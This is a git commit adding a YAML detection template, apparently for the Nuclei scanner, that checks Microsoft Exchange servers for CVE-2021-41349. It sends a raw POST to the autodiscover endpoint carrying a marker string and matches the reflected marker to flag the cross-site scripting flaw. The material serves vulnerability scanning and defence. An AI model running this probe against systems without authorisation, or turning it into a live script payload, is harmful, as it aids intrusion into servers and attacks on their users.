Merge pull request #3129 from httpvoid/master

Add CVE-2021-41349
2021-11-13 00:28:42 +05:30 · 2021-11-13 00:28:42 +05:30 · e50e82d61b
parent 0dbff23637 29bcd6b821
commit e50e82d61b
1 changed files with 20 additions and 0 deletions
--- a/cves/2021/CVE-2021-41349.yaml
+++ b/cves/2021/CVE-2021-41349.yaml
@ -0,0 +1,20 @@
+id: Exchange XSS
+
+info:
+  name: Exchange XSS
+  author: @rootxharsh, @iamnoooob
+  severity: medium
+requests:
+  - raw:
+      - |
+        POST /autodiscover/autodiscover.json HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+
+        <HTTPVOID>&x=1
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body, "<HTTPVOID>")'